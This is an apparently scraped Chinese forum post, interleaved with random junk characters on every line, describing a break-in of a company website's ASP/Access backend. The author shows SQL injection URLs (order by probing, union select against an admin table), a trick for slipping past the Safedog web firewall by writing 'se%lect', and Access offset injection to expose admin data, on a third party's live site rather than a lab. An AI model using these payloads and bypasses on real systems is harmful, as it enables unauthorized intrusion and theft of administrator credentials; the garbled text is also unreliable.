打开网站,一个企业站。& x5 C7 j3 M4 I8 ~; N8 l
, ~# k4 z) i7 I2 {( X& h
8 R+ B u! L4 F$ N: P( u顺手加个admin
# @$ B, j- o9 B+ R7 }$ E6 b F, _/ X. b. B% X( C! f& n4 A# I
U- X" E! T' e2 D
默认后台。' [& h7 }0 p/ e4 y8 E
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
2 P6 B, l- |- W% ^. o+ e, f, ^3 h( _6 i/ p
! ?, I o& c2 d5 a% S2 H* ^8 }' S
2 i$ Q& B' o; p所以就不用御剑扫了,待会直接封IP。* J" X* V5 m7 B4 e
+ S6 B, l/ o7 v' e$ n用order by语句判断是否存在注入。
: S8 e' Z' n+ @& J) t1 B1 Xhttp://www.xxx.com /product_show.asp?id=997 order by 1
* j' k% z' t6 L. p; Chttp://www.xxx.com /product_show.asp?id=997 order by 100
. _- z* v0 W: w现在存在注入,经测试后发现是9个字段。
; z/ a' N5 M3 V6 f2 X4 r7 ~& u 0 |/ {* @. \; O
接下来进行联合查询,猜是否存在admin表。
# n7 R8 K6 B6 ]0 ~. ~5 \6 h# jhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
6 k2 I: x f6 r) S' t. w2 V# g# G( ?6 i& T2 o
4 P2 K/ M. { t
0 p# b2 ~0 L' T( F
在select中间加个%,se%lect绕过安全狗。
! \6 }' q$ z6 c1 h+ f4 V4 ]) _: o, b& }0 z7 h/ Q
6 g% L% u' t9 X! u2 j* J发现存在admin表,然后开始手工猜常用的字段。
: E2 D6 C+ m4 c& f$ }纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
/ J" y* c! s: t, W * R; [( n$ v5 U6 i0 o
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。: S; V, [$ M7 o$ l/ F4 B5 G
5 x2 ^3 k; ?, L- D3 W4 n0 J8 ~* @科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。+ v8 m3 Z5 v: M# ^3 j2 Q" [9 J8 Z
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
" G4 i+ W- R: `好了,敏感内容出显了。
$ S+ x1 Q2 l5 k/ A; X% Z* ]
* E! r0 x5 Q& R% u' |
( }8 F; ~. `0 c1 C( d: m0 R, f
6 r, ?/ F) z# M; m5 {* m |